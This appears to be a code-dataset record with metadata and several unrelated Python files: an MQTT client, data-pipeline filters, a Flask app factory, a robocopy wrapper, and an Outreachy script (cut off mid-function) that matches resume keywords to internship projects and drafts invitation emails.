0.030864
0
0
0
0
0
0.115385
1
0.038462
false
0
0.230769
0
0.307692
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
821984511dee58e92708aa60fa96d6d0d20fe0cf
2,918
py
Python
mqtt_interface/mqtt_library/mqtt_client_py3.py
bopopescu/docker_images_a
348d0982c5962f2ae34d10183ed9522b7a6fe286
[ "MIT" ]
2
2018-02-21T03:46:51.000Z
2019-12-24T16:40:51.000Z
mqtt_interface/mqtt_library/mqtt_client_py3.py
bopopescu/docker_images_a
348d0982c5962f2ae34d10183ed9522b7a6fe286
[ "MIT" ]
7
2020-07-16T19:54:08.000Z
2022-03-02T03:29:07.000Z
mqtt_interface/mqtt_library/mqtt_client_py3.py
bopopescu/docker_images_a
348d0982c5962f2ae34d10183ed9522b7a6fe286
[ "MIT" ]
2
2018-04-16T07:02:35.000Z
2020-07-23T21:57:19.000Z
import paho.mqtt.client as mqtt import ssl import redis import time class MQTT_CLIENT(object): def __init__(self,redis_site_data,server,port,user_name,password_key): self.server = server self.port = port self.redis_site_data = redis_site_data self.client = mqtt.Client(client_id="", clean_session=True, userdata=None, transport="tcp") self.client.tls_set(certfile= "/home/pi/mosquitto/certs/client.crt", keyfile= "/home/pi/mosquitto/certs/client.key", cert_reqs=ssl.CERT_NONE ) redis_handle_pw = redis.StrictRedis(redis_site_data["host"], redis_site_data["port"], db=redis_site_data["redis_password_db"], decode_responses=True) self.client.username_pw_set(user_name, redis_handle_pw.hget(password_key,user_name)) self.client.on_connect = self.on_connect self.client.on_publish = self.on_publish def connect(self): self.rc = -1 self.client.connect(self.server, self.port, 60) self.client.loop_start() for i in range(0,50): time.sleep(.1) if self.rc == 0: return True return False def loop(self,time): self.client.loop(time) def on_connect(self,client, userdata, flags, rc): print("on connect",flags,rc) self.rc = rc #self.client.loop_stop() def on_publish(self, client, userdata, mid): self.callback_flag = True self.mid_server = mid def disconnect(self): self.client.disconnect() self.client.loop_stop() def publish(self,topic,payload=None,qos=0,retain=False): self.callback_flag = False self.mid_server = -1 self.client_result ,self.mid_client = self.client.publish(topic, payload, qos, retain) if self.client_result != 0: return False,-1 self.client.loop(5) for i in range(0,50): time.sleep(.1) if self.callback_flag == True: if (self.mid_server == self.mid_client): return True ,0 else: return False , -2 return False,-3 if __name__ == "__main__": import json import time file_handle = open("../system_data_files/redis_server.json",'r') data = file_handle.read() file_handle.close() redis_site_data = json.loads(data) mqtt_client = MQTT_CLIENT(redis_site_data) print(mqtt_client.connect()) print("starting to publish") print(mqtt_client.publish("REMOTES/SLAVE:1/TEMPERATURE:Case",72)) while True: pass
32.422222
150
0.561343
349
2,918
4.472779
0.292264
0.108905
0.066624
0.021781
0.098655
0.038437
0.038437
0.038437
0.038437
0.038437
0
0.011911
0.338245
2,918
90
151
32.422222
0.796479
0.007882
0
0.090909
0
0
0.07344
0.049911
0
0
0
0
0
1
0.106061
false
0.060606
0.090909
0
0.30303
0.060606
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
1
8219bdf4aa36724d7acd9da5d6d73731f34ef6cd
979
py
Python
pyminer/network/filters.py
rbrecheisen/pyminer
c1b088cd9eddf0347b5c3e9354991374c7344a33
[ "Apache-2.0" ]
null
null
null
pyminer/network/filters.py
rbrecheisen/pyminer
c1b088cd9eddf0347b5c3e9354991374c7344a33
[ "Apache-2.0" ]
1
2015-05-15T12:06:25.000Z
2015-10-18T15:43:34.000Z
pyminer/network/filters.py
rbrecheisen/pyminer
c1b088cd9eddf0347b5c3e9354991374c7344a33
[ "Apache-2.0" ]
null
null
null
__author__ = 'Ralph' import pandas as pd from base import Node from base import InputPort from base import OutputPort class Filter(Node): def __init__(self, name): super(Filter, self).__init__(name) self.add_input_port( InputPort(name='input', data_type=pd.DataFrame)) self.add_output_port( OutputPort(name='output', data_type=pd.DataFrame)) def execute(self): raise RuntimeError('Not implemented') class FilterExamples(Filter): def __init__(self): super(FilterExamples, self).__init__('FilterExamples') self.set_required_config_items(['filter_type']) self._filter_types = ['all'] def execute(self): self.check_config() data = self.get_input_port('input').get_data() if data is None: return self.get_output_port('output').set_data(data) class FilterExampleRange(Filter): pass class RemoveDuplicates(Filter): pass
20.395833
62
0.659857
116
979
5.232759
0.396552
0.039539
0.069193
0.062603
0
0
0
0
0
0
0
0
0.235955
979
48
63
20.395833
0.811497
0
0
0.137931
0
0
0.071429
0
0
0
0
0
0
1
0.137931
false
0.068966
0.137931
0
0.448276
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
1
821a8e57cdc8b71c46b5b924928e6ffbc5170020
329
py
Python
delphi/apps/rest_api/__init__.py
mwdchang/delphi
c6177f2d614118883eaaa7f5300f3e46f10ddc7e
[ "Apache-2.0" ]
null
null
null
delphi/apps/rest_api/__init__.py
mwdchang/delphi
c6177f2d614118883eaaa7f5300f3e46f10ddc7e
[ "Apache-2.0" ]
null
null
null
delphi/apps/rest_api/__init__.py
mwdchang/delphi
c6177f2d614118883eaaa7f5300f3e46f10ddc7e
[ "Apache-2.0" ]
1
2019-07-18T19:13:13.000Z
2019-07-18T19:13:13.000Z
from flask import Flask from flask_sqlalchemy import SQLAlchemy db = SQLAlchemy() def create_app(debug=False): from delphi.apps.rest_api.api import bp app = Flask(__name__) app.config.from_object("delphi.apps.rest_api.config") app.debug=debug db.init_app(app) app.register_blueprint(bp) return app
21.933333
57
0.735562
49
329
4.714286
0.44898
0.077922
0.121212
0.147186
0
0
0
0
0
0
0
0
0.173252
329
14
58
23.5
0.849265
0
0
0
0
0
0.082067
0.082067
0
0
0
0
0
1
0.090909
false
0
0.272727
0
0.454545
0.090909
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
821e77dee58f0bcdb435a5eecbf66592783bf963
4,524
py
Python
rob/robocopy.py
dan-osull/rob
25f2781cc5124570a04a48b56ec7d7f802b0650b
[ "MIT" ]
3
2022-02-08T20:10:21.000Z
2022-02-08T20:18:54.000Z
rob/robocopy.py
dan-osull/rob
25f2781cc5124570a04a48b56ec7d7f802b0650b
[ "MIT" ]
null
null
null
rob/robocopy.py
dan-osull/rob
25f2781cc5124570a04a48b56ec7d7f802b0650b
[ "MIT" ]
null
null
null
import os import subprocess from dataclasses import dataclass from pathlib import WindowsPath from time import sleep from typing import Optional, Sequence from click import ClickException from rich.progress import Progress import rob.console as con import rob.filesystem @dataclass class RobocopyResults: options: list[str] # Using Sequence because "list" and other mutable container types are # considered "invariant", so the contained type needs to match exactly. # https://github.com/microsoft/pyright/issues/130 errors: Sequence[Optional[str]] stats: Sequence[Optional[str]] def parse_robocopy_output( output: str, ) -> RobocopyResults: output_list = output.split("\n") output_list = [line for line in output_list if line] divider_idx = [] for index, line in enumerate(output_list): # 50 chars long. Finds dividers in output, which are 78/79 chars. if "--------------------------------------------------" in line: divider_idx.append(index) options = output_list[divider_idx[1] + 1 : divider_idx[2]] if len(divider_idx) == 3: errors = output_list[divider_idx[2] + 1 :] stats = [] else: errors = output_list[divider_idx[2] + 1 : divider_idx[3]] stats = output_list[divider_idx[3] + 1 :] return RobocopyResults( options=options, errors=errors, stats=stats, ) def run_robocopy( source: WindowsPath, target: WindowsPath, dir_size_bytes: Optional[int] = None, dry_run: bool = False, copy_permissions: bool = False, quiet=False, ) -> None: msg = f"Copying data from {con.style_path(source)} to {con.style_path(target)}" if not dir_size_bytes: dir_size_bytes = rob.filesystem.get_dir_size(source) if target.exists(): con.print_(msg) raise ClickException("{target} already exists") if dry_run: con.print_(msg, end="") con.print_skipped() return if not quiet: con.print_(msg) robocopy_exe = ( WindowsPath(os.environ["SystemRoot"]) .joinpath("system32/robocopy.exe") .resolve() ) robocopy_args = [ str(robocopy_exe), str(source), str(target), "/E", # copy subdirectories, including Empty ones. "/MT", # Do multi-threaded copies with n threads (default 8). "/R:0", # number of Retries on failed copies: default 1 million. "/NDL", # No Directory List - don't log directory names. "/NFL", # No File List - don't log file names. "/NP", # No Progress - don't display percentage copied. ] if copy_permissions: robocopy_args.append( # /COPY flags: D=Data, A=Attributes, T=Timestamps, X=Skip alt data streams, # S=Security=NTFS ACLs, O=Owner info, U=aUditing info "/COPY:DATSO" ) proc = subprocess.Popen( args=robocopy_args, stdout=subprocess.PIPE, # stderr included for completeness, robocopy doesn't seem to use it stderr=subprocess.STDOUT, text=True, ) while proc.poll() is None: # "is None" so that returncode 0 breaks loop # 0: No errors occurred, and no copying was done. # The source and destination directory trees are completely synchronized. # 1: One or more files were copied successfully (that is, new files have arrived). # https://ss64.com/nt/robocopy-exit.html if not quiet: with Progress(auto_refresh=False, transient=True) as progress: task_id = progress.add_task( "[green]Copying data...[/green]", total=dir_size_bytes ) progress.update(task_id, completed=rob.filesystem.get_dir_size(target)) progress.refresh() sleep(2) output = proc.stdout.read() # type: ignore # Exit code cannot be trusted as, for example, this error: # ERROR 5 (0x00000005) Copying NTFS Security to Destination Directory # ...can be present despite returncode 0, so let's look for errors ourselves robocopy_results = parse_robocopy_output(output) if robocopy_results.errors: raise ClickException(f"Robocopy: {str(robocopy_results.errors)}") if dir_size_bytes != rob.filesystem.get_dir_size(target): raise ClickException("Source and target folder sizes do not match. Aborting.") if not quiet: con.print_("[green]Data copy complete[/green]")
34.8
90
0.6355
566
4,524
4.971731
0.431095
0.031983
0.021322
0.028429
0.070007
0.057214
0.044776
0.024876
0
0
0
0.012496
0.257073
4,524
129
91
35.069767
0.824755
0.270115
0
0.050505
0
0
0.111009
0.045441
0
0
0
0
0
1
0.020202
false
0
0.10101
0
0.181818
0.050505
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
821f4a58cdad24897457c7d61f286692df08d3ee
31,892
py
Python
code/resumesearch.py
outreachy/creative-works-and-scripts
8cac43a649aefaa793b91ac34ef73e20194ca22a
[ "CC-BY-4.0" ]
27
2019-07-18T04:44:29.000Z
2022-02-15T21:15:09.000Z
code/resumesearch.py
outreachy/creative-works-and-scripts
8cac43a649aefaa793b91ac34ef73e20194ca22a
[ "CC-BY-4.0" ]
5
2019-08-08T21:15:39.000Z
2022-02-22T01:38:55.000Z
code/resumesearch.py
outreachy/creative-works-and-scripts
8cac43a649aefaa793b91ac34ef73e20194ca22a
[ "CC-BY-4.0" ]
13
2020-01-13T11:38:45.000Z
2022-01-25T17:48:29.000Z
#!/usr/bin/env python3 # # Copyright 2017 Sarah Sharp <sharp@otter.technology> # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. # # This script attempts to match skillset keywords in resumes with # Outreachy projects. The skillset keyword lists are based on the # Outreachy project list at: # https://wiki.gnome.org/Outreachy/2017/MayAugust # # This program expects you to have created a directory with identically # named PDF and text resume files. You can translate PDF files to text with: # $ for i in `ls *.pdf`; do pdftotext $i; done import argparse import csv import os import re import textwrap #from fuzzywuzzy import fuzz from enum import Enum from collections import Counter from shutil import copyfile class outreachyProject: """Outreachy project name, description, keywords, and matching resume storage.""" def __init__(self, name, short, description, keywords, printskip): self.name = name self.description = description self.keywords = keywords self.strongResumeMatches = [] self.weakResumeMatches = [] self.short = short self.printskip = printskip class resumeFile: """Information relating to a text and pdf resume pair.""" def __init__(self, path, textFileName, contents): self.path = path self.textFileName = textFileName self.pdfFileName = os.path.splitext(textFileName)[0] + '.pdf' self.contents = contents self.emails = re.findall(r'[\w\.-\_\+]+@[\w\.-]+', contents) self.strongProjectMatches = [] self.weakProjectMatches = [] def readResumeFiles(directory): resumeFiles = [] for f in [l for l in os.listdir(directory) if l.endswith('.txt') and not l.endswith('-email.txt') and not l.endswith('-email-tam.txt')]: with open(os.path.join(directory, f), 'r') as resume: contents = resume.read() resumeFiles.append(resumeFile(directory, f, contents)) #print("Found", len(resumeFiles), "resume files") for r in resumeFiles: if len(r.emails) == 0: continue line = r.pdfFileName for email in r.emails: line = line + ' ' + email line = line + ' ' + str(len(r.contents)) # The first email is usually the actual email. emails = [resume.emails[0] for resume in resumeFiles if resume.emails] edups = [item for item, count in Counter(emails).items() if count > 1] for email in edups: pdfs = [resume.pdfFileName for resume in resumeFiles if resume.emails and resume.emails[0] == email] print('Email duplicate:', email, ' '.join(pdfs)) return resumeFiles def searchForEmail(csvFile, resumeFiles): with open(csvFile, 'r') as csvFile: freader = csv.DictReader(csvFile, delimiter=',', quotechar='"') boothstops = [] for row in freader: # Create a list of potential matches for the email we have. # Search through the list of emails in each PDF. # Use fuzzywuzzy to do a fuzzy search in case we misread an email. # No difference between pure match when I tried this, and going down to 80 only added false positives #m = [r for r in resumeFiles if len([email for email in r.emails if fuzz.ratio(row['Email'], email) > 90]) != 0] m = [r for r in resumeFiles if row['Email'] in r.emails] if len(m) == 0: continue files = set() for resume in m: files.add(resume.pdfFileName) boothstops.append((row['Email'], list(files))) return boothstops projectsMay2017 = [ #outreachyProject('Outreachy', # ['open source', 'free software', 'Linux', 'Unix', 'Solaris']), outreachyProject('Cadasta', 'a property rights tool', 'enhance user settings and create a user dashboard', ['django'], []), outreachyProject('Cadasta', 'a property rights tool', 'add new login options', ['django|oauth'], []), outreachyProject('Cadasta', 'a property rights tool', 'improve automated test coverage', ['selenium'], []), outreachyProject('Ceph', 'a network filesystem', 'create a root cause analysis tool for Linux distributed systems', ['linux', 'distributed systems'], ['linux', 'distributed systems']), outreachyProject('Ceph', 'a network filesystem', 'evaluate the performance of new reweight algorithms for balancing storage utilization', ['statistics', 'storage', 'linux'], ['statistics', 'storage', 'linux']), outreachyProject('Ceph', 'a network filesystem', 'design a status dashboard to visualize Ceph cluster statistics', ['python', 'linux', 'javascript', 'html5', 'css3'], []), outreachyProject('Ceph', 'a network filesystem', 'identify performance degradation in nodes and automate cluster response', ['Linux', 'python', 'distributed systems'], []), outreachyProject('Ceph','a network filesystem', 'design a simplified database backend for the Ceph Object Gateway', ['database', 'Linux', 'C\+\+'], ['database']), outreachyProject('Ceph','a network filesystem', 'port tests written in multiple languages to test the Amazon S3 storage protocol and Openstack Swift storage', ['python', 'linux', 'storage'], ['storage']), outreachyProject('Debian', 'a Linux distribution', 'benchmark scientific packages for general and architecture specific builds', ['linux', 'gcc'], ['linux']), outreachyProject('Debian', 'a Linux distribution', 'improve the Debian test database and website', ['linux', 'python', 'sql', 'shell|bash|command-line'], ['linux', 'command-line']), outreachyProject('Debian', 'a Linux distribution', 'enhance the Debian test website', ['html', 'css', 'linux', 'graphic'], ['linux', 'graphic']), outreachyProject('Debian', 'a Linux distribution', 'Add secure mail server support to FreedomBox (a web server for small machines)', ['python', 'django', 'shell|bash|command-line'], ['command-line']), outreachyProject('Discourse', 'chat forum software', 'enhance their forum and chat web services', ['rails', 'javascript|ember.js'], []), outreachyProject('Fedora', 'a Linux distribution', 'create a coloring book to explain technical concepts', ['inkscape|scribus|storyboard|storyboarding|graphic design'], ['graphic design', 'storyboard', 'storyboarding']), outreachyProject('Fedora', 'a Linux distribution', 'improve Bodhi, the web-system that publishes updates for Fedora', ['python', 'javascript|html|css|linux|fedora'], []), outreachyProject('GNOME', None, 'improve the recipes or maps applications', ['gtk'], []), outreachyProject('Lagome', 'a microservices platform', "create an online auction sample app to showcase Lagome's microservices", ['java', 'scala|react|reactive'], ['react', 'reactive']), outreachyProject('Linux kernel', None, 'analyze memory resource release operators and fix Linux kernel memory bugs', ['linux', 'operating systems', 'memory'], ['linux', 'operating systems', 'memory']), outreachyProject('Linux kernel', None, 'improve process ID allocation', ['linux', 'operating systems', 'kernel'], ['linux', 'operating systems', 'kernel']), outreachyProject('Linux kernel', None, 'improve nftables (an in-kernel network filtration tool)', ['linux', 'operating systems', 'networking'], ['linux', 'operating systems', 'networking']), outreachyProject('Linux kernel', None, 'write a driver for a sensor using the Industrial I/O interface', ['linux', 'operating systems|robotics|embedded', 'C\+\+|C(?!\+\+)'], ['linux', 'operating systems', 'robotics', 'embedded', 'c++']), outreachyProject('Linux kernel', None, 'improve documentation build system and translate docs into ReStructured Text format', ['perl', 'python', 'operating systems'], ['operating systems']), outreachyProject('Mozilla', None, None, ['mozilla|firefox'], ['mozilla', 'firefox']), outreachyProject('OpenStack', 'software for cloud deployment and management', 'add continuous integration for OpenStack Identity Service (keystone) LDAP support', ['python', 'shell|bash|command-line'], ['command-line']), outreachyProject('oVirt', 'virtualization management software', 'implement oVirt integration tests using Lago and the oVirt REST API', ['python', 'rest'], ['rest']), outreachyProject('oVirt', 'virtualization management software', 'design an oVirt log analyzer for distributed systems', ['python', 'linux', 'distributed systems'], ['distributed systems']), outreachyProject('oVirt', 'virtualization management software', 'rewrite oVirt UI dialogs in modern JavaScript technologies', ['es6|react|redux'], []), outreachyProject('QEMU', 'hardware virtualization software', 'rework the QEMU audio backend', ['C(?!\+\+)', 'audio'], ['audio']), outreachyProject('QEMU', 'hardware virtualization software', 'create a full and incremental disk backup tool', ['C(?!\+\+)', 'python', 'storage'], ['storage']), outreachyProject('QEMU', 'hardware virtualization software', "refactor the block layer's I/O throttling and write notifiers", ['C(?!\+\+)', 'storage'], ['storage']), outreachyProject('QEMU', 'hardware virtualization software', "code an emulated PCIe-to-PCI bridge", ['pci|pcie'], ['pci', 'pcie']), outreachyProject('QEMU', 'hardware virtualization software', "add x86 virtualization support on macOS using Hypervisor.framework", ['C(?!\+\+)', 'mac', 'virtualization'], ['mac', 'virtualization']), outreachyProject('QEMU', 'hardware virtualization software', "extend the current vhost-pci based inter-VM communication", ['C(?!\+\+)', 'pci'], ['pci']), outreachyProject('Sugar Labs', 'a software-development and learning community', 'improve Music Blocks, an application for exploring fundamental musical concepts', ['javascript|JS', 'music'], ['music']), outreachyProject('Wikimedia', 'a non-profit known for Wikipedia', 'write a Zotero translator and document the process', ['javascript', 'documentation'], ['documentation']), outreachyProject('Wikimedia', 'a non-profit known for Wikipedia', 'improve and fix bugs in the quiz extension', ['php', 'documentation'], ['documentation']), outreachyProject('Wikimedia', 'a non-profit known for Wikipedia', 'create user guides to help with translation outreach', ['translation|localization'], ['translation', 'localization']), outreachyProject('Wikimedia', 'a non-profit known for Wikipedia', 'implement automatic edits on wikis connected to the Programs & Events Dashboard', ['rails'], []), outreachyProject('Wikimedia', 'a non-profit known for Wikipedia', 'implement an automatic article feedback feature for the Programs & Events Dashboard', ['rails'], []), outreachyProject('Wine', 'a tool to run Windows programs on Linux or BSD', 'implement a resource editor and dialog editor', ['C(?!\+\+)', 'Windows', 'UI|UX'], ['windows', 'ui', 'ux']), outreachyProject('Wine', 'a tool to run Windows programs on Linux or BSD', 'implement missing D3DX9 APIs', ['C(?!\+\+)', 'computer graphics'], []), outreachyProject('Wine','a tool to run Windows programs on Linux or BSD', 'implement Direct3D microbenchmarks', ['C(?!\+\+)', 'opengl'], []), outreachyProject('Wine','a tool to run Windows programs on Linux or BSD', 'create automated game benchmarks', ['C(?!\+\+)', 'game engine'], ['game engine']), outreachyProject('Wine','a tool to run Windows programs on Linux or BSD', 'port WineLib to a new architecture (such as PPC64, Sparc64, RISC-V, or x32)', ['PPC|PowerPC|Sparc|Sparc64|RISC-V'], ['ppc', 'powerpc', 'sparc', 'sparc64', 'risc-v']), outreachyProject('Wine','a tool to run Windows programs on Linux or BSD', 'improve the AppDB website, which lists Wine support for Windows programs', ['php', 'html', 'mysql'], []), outreachyProject('Xen Project', 'a virtualization platform', 'create golang bindings for libxl on the Xen hypervisor', ['go', 'C(?!\+\+)'], []), outreachyProject('Xen Project', 'a virtualization platform', 'create rust bindings for libxl on the Xen hypervisor', ['rust'], ['rust']), outreachyProject('Xen Project', 'a virtualization platform', 'enhance the KDD (Windows Debugger Stub) for the Xen hypervisor', ['C(?!\+\+)', 'windows', 'kernel|debugger'], ['windows', 'debugger']), outreachyProject('Xen Project', 'a virtualization platform', 'fuzz test the Xen hypercall interface', ['C(?!\+\+)', 'assembly', 'gcc'], []), outreachyProject('Xen Project', 'a virtualization platform', 'improve Mirage OS, a unikernel that runs on top of Xen', ['ocaml'], []), outreachyProject('Xen Project', 'a virtualization platform', 'create a Xen code review dashboard', ['sql', 'javascript', 'html5', 'java'], []), #outreachyProject('Xen Project', 'a virtualization platform', # 'implement tools for code standards checking using clang-format', # ['clang']), outreachyProject('Xen Project', 'a virtualization platform', 'add more FreeBSD testing to osstest', ['freebsd|bsd|openbsd|netbsd|dragonfly'], ['freebsd', 'bsd', 'openbsd', 'netbsd', 'dragonfly']), outreachyProject('Yocto', 'a tool for creating embedded Linux distributions', 'improve and document the Yocto autobuilder', ['C(?!\+\+)', 'python', 'distro|linux|yocto|openembedded', 'embedded|robotics|beaglebone|beagle bone|minnow|minnowboard|arduino'], ['distro', 'linux', 'yocto', 'embedded', 'robotics', 'beaglebone', 'beagle bone', 'minnow', 'minnowboard', 'arduino']), ] # We have two types of resumes: # 1. They matched *some* but not all of the important keywords for a project. # 2. They matches all of the keywords we need. def matchResumes(resumeFiles): for resume in resumeFiles: for project in projectsMay2017: matches = [set(re.findall(r'\b(?:' + keyword + r')\b', resume.contents, flags=re.IGNORECASE)) for keyword in project.keywords] # New syntax for me! # * takes a list and expands it to arguments to a function. # ** takes a dictionary and expands it to key-value arguments to a function. # union combines the list of sets and removes duplicates. keywords = set.union(*matches) if all(matches): resume.strongProjectMatches.append((project, keywords)) project.strongResumeMatches.append(resume) elif any(matches): resume.weakProjectMatches.append((project, keywords)) project.weakResumeMatches.append(resume) def matchWithProjects(resumeFiles): goldresumes = [] matchResumes(resumeFiles) #for project in projectsMay2017: # print(len(project.strongResumeMatches), '\t', project.name, '\t', project.description) #print('Resumes to review:', len([resume for resume in resumeFiles if len(resume.strongProjectMatches) > 0])) #print('Resumes with strong matches:') #for i in range(1, 9): # resumeCount = [resume for resume in resumeFiles if len(resume.strongProjectMatches) == i] # if resumeCount: # print(len(resumeCount), 'with', i, 'strong matches') #resumeCount = [resume for resume in resumeFiles if len(resume.strongProjectMatches) > 9] #if resumeCount: # print(len(resumeCount), 'with > 10 matches') #print('Resumes with weak matches:') #for i in range(1, 9): # resumeCount = [resume for resume in resumeFiles # if not resume.strongProjectMatches and len(resume.weakProjectMatches) == i] # if resumeCount: # print(len(resumeCount), 'with', i, 'weak matches') #resumeCount = [resume for resume in resumeFiles # if not resume.strongProjectMatches and len(resume.weakProjectMatches) > 9] #if resumeCount: # print(len(resumeCount), 'with > 10 matches') header1 = '''From: Sarah Sharp <saharabeara@gmail.com> ''' header3 = '''Reply-to: outreachy-admins@gnome.org Subject: Internship opportunities ''' noBooth = '''Greetings! I'm Sarah Sharp, and we both attended the Tapia conference last September. I'd like to invite you to apply to two programs programs that provide paid internships in open source. Interns will work remotely with experienced mentors. ''' # offer to host Outreachy session if they signed up at the booth or mention open # source in their resume? # What about the students at universities hosting introductory sessions? atBooth = '''Greetings! I'm Sarah Sharp, and we met when you stopped by the Outreachy booth at the Tapia conference last September. I'd like to invite you to apply to two programs programs that provide paid internships. Interns will work remotely with experienced mentors. ''' generalInfo = '''Google Summer of Code is open to all university students: https://developers.google.com/open-source/gsoc/ Outreachy is open internationally to women (both cis & trans), trans men, and genderqueer folks. It is also open to U.S. residents and nationals of any gender who are Black/African American, Hispanic/Latin@, American Indian, Alaska Native, Native Hawaiian, or Pacific Islander. https://wiki.gnome.org/Outreachy/ Both programs offer internships from May 30 to August 30. Google Summer of Code application process runs from Feb 28 to Apr 3, while Outreachy's application process runs from Feb 16 to Mar 30. Google Summer of Code application only requires a project proposal. Outreachy also requires applicants to make project contributions. ''' moreInfo = '''The full list of Outreachy internship projects is available at: https://wiki.gnome.org/Outreachy/2017/MayAugust Please let me know if you have any questions about the Outreachy program. Outreachy coordinators (Marina, Karen, Cindy, Tony, and I) can all be reached at outreachy-admins@gnome.org You can contact all organization mentors by emailing outreachy-list@gnome.org I hope you'll apply! Thanks, Sarah Sharp ''' # TODO: # 1. Remove the generic description when we have a good resume match; it's more personal. LINEWRAP = 68 def writeInitialInvitation(emaildir, resume, boothlist, matches): project, keywords = matches[0] para = ("Based on your resume, if you're eligible for Outreachy, it looks like you might be a good fit for in an internship with " + project.name) if project.short: para = para +' (' + project.short + ')' if not project.description: return textwrap.fill(para + '.', LINEWRAP, replace_whitespace=False) + '\n\n' para = para + ' which is offering an internship to ' + project.description keywords = [k for k in keywords if k.lower() not in project.printskip] if keywords: para = para + ' that involves working with ' k = list(set(keywords)) if len(k) == 1: para = para + k[0] elif len(k) == 2: para = para + ' and '.join(k) else: para = para + ', '.join(k[:-1]) + ' and ' + k[-1] return para def writeStrongInvitation(emaildir, resume, boothlist): matches = sorted(resume.strongProjectMatches, key=lambda match: len(match[1])) project, keywords = matches[0] para = writeInitialInvitation(emaildir, resume, boothlist, matches) if len(resume.strongProjectMatches) > 1: para = (para + '. You may also be interested in the ' + project.name + ' internship') if len(resume.strongProjectMatches) > 2: para = para + 's to ' else: para = para + ' to ' descriptions = [] for project, keywords in matches[1:-1]: para = para + project.description + ' or the internship to ' para = para + matches[-1][0].description return textwrap.fill(para + '.', LINEWRAP) + '\n\n' def writeMultipleStrongInvitation(emaildir, resume, boothlist): matches = sorted(resume.strongProjectMatches, key=lambda match: len(match[1])) project, keywords = matches[0] para = writeInitialInvitation(emaildir, resume, boothlist, matches) doneProjects = set() for project, keywords in matches[1:]: projmatches = [(p, k) for p, k in matches[1:] if p not in doneProjects and p.name == project.name ] if not projmatches: continue doneProjects.add(project) for p, k in projmatches: para = (para + '. You may also be interested in the ' + p.name + ' internship') if not p.description: break if len(projmatches) > 2: para = para + 's to ' else: para = para + ' to ' descriptions = [] for p2, k2 in projmatches[1:-1]: para = para + p2.description + ' or the internship to ' para = para + projmatches[-1][0].description return textwrap.fill(para + '.', LINEWRAP) + '\n\n' class emailType(Enum): strong = 1 mixed = 2 weak = 3 def craftEmail(emaildir, resume, boothlist, strength): email = header1 + 'To: ' + ', '.join(resume.emails) + '\n' + header3 if resume.pdfFileName in boothlist: email = email + atBooth else: email = email + noBooth if strength is emailType.strong: email = (email + generalInfo + writeStrongInvitation(emaildir, resume, boothlist) + moreInfo) elif strength is emailType.mixed: email = (email + generalInfo + writeMultipleStrongInvitation(emaildir, resume, boothlist) + moreInfo) ext = '-email.txt' with open(os.path.join(emaildir, os.path.splitext(resume.textFileName)[0] + ext), 'w') as f: f.write(email) def createFormEmails(directory, resumeFiles, boothlist): # For all resumes with one strong match or multiple strong matches with the same organization: # Create a directory with the organization name (lowercase, with spaces replaced with dashes) # Copy pdf resume into that directory, create basename-email.txt oneStrong = [resume for resume in resumeFiles if len(resume.strongProjectMatches) == 1] print('Resumes with exactly one match:', len(oneStrong)) left = [resume for resume in resumeFiles if resume not in oneStrong] for resume in left: if not resume.strongProjectMatches: continue firstMatch = resume.strongProjectMatches[0][0].name for match in resume.strongProjectMatches[1:]: if match[0].name != firstMatch: firstMatch = '' break if firstMatch: oneStrong.append(resume) left = [resume for resume in resumeFiles if resume not in oneStrong] print('Resumes with exactly one match or multiple matches with same org:', len(oneStrong)) print('Other resumes:', len(left)) for project in projectsMay2017: matches = [resume for resume in oneStrong if resume.strongProjectMatches[0][0].name == project.name] if not matches: continue dirpath = os.path.join(directory, 'emails-' + re.sub(r'\s+', '-', project.name.lower())) if not os.path.exists(dirpath): os.makedirs(dirpath) for resume in matches: try: if not os.path.exists(os.path.join(dirpath, resume.pdfFileName)): copyfile(os.path.join(directory, resume.pdfFileName), os.path.join(dirpath, resume.pdfFileName)) except: print('Could not find pdf file for', resume.textFileName) continue craftEmail(dirpath, resume, boothlist, emailType.strong) # For all resumes with strong matches with multiple orgs (but less than 4 orgs): # Create a directory called strong-mixed. # Copy pdf resume into that directory, create basename-email.txt # # "Based on your resume, it looks like you might be interested in an # internship with $PROJECT that involves $KEYWORDS which is offering an internship for # $DESCRIPTION. # # Additionally, you might be interested in $PROJECT that involves $KEYWORDS which # is offering an internship for $DESCRIPTION." mixed = [resume for resume in resumeFiles if resume not in oneStrong and resume.strongProjectMatches] dirpath = os.path.join(directory, 'mixed') if not os.path.exists(dirpath): os.makedirs(dirpath) for resume in mixed: try: if not os.path.exists(os.path.join(dirpath, resume.pdfFileName)): copyfile(os.path.join(directory, resume.pdfFileName), os.path.join(dirpath, resume.pdfFileName)) except: print('Could not find pdf file for', resume.textFileName) continue craftEmail(dirpath, resume, boothlist, emailType.mixed) # For all resumes with strong matches with 4 or more orgs: # Create a directory called strong-scattered. # Copy pdf resume into that directory, create basename-email.txt # For all weakly matched resumes - figure out top keywords that matched weak resumes. hitcount = Counter() for resume in [resume for resume in resumeFiles if not resume.strongProjectMatches]: allkeywords = set() for project, keywords in resume.weakProjectMatches: allkeywords.update(keywords) for keyword in keywords: allkeywords.add(keyword) hitcount.update(allkeywords) # Take the top N keywords that weakly matched, find all projects that matched those keywords. # "Based on your resume, it looks like you might be interested in Outreachy # projects involving $KEYWORD like $MATCHES" def craftGenericEmail(emaildir, resume): if not resume.emails: address = '' else: address = resume.emails[0] email = header1 + 'To: ' + address + '\n' + header3 email = email + noBooth email = (email + generalInfo + moreInfo) ext = '-email.txt' with 